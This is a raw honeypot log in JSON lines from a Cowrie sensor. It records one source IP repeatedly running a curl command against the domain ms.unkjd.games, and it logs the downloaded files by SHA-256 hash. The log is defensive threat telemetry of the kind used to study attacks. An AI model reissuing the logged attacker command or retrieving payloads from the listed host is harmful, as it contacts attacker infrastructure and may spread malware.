{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.179756Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.181647Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.183945Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.186122Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.188522Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.190602Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.192863Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.196284Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.198125Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.198774Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.201302Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.219079Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.221908Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.224047Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.226051Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.227407Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.228334Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.230558Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.231425Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.234012Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.238656Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.241754Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.245478Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.248003Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.270756Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.272365Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.273178Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.279310Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.282770Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.286001Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.289228Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.293582Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.295287Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.296201Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.298404Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.299635Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.329443Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.330244Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.335045Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.336722Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.338877Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.341213Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.342596Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.345129Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.347656Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.350461Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.353695Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.360222Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.368855Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.373885Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.375590Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.376724Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.377617Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.379407Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.380049Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.386311Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
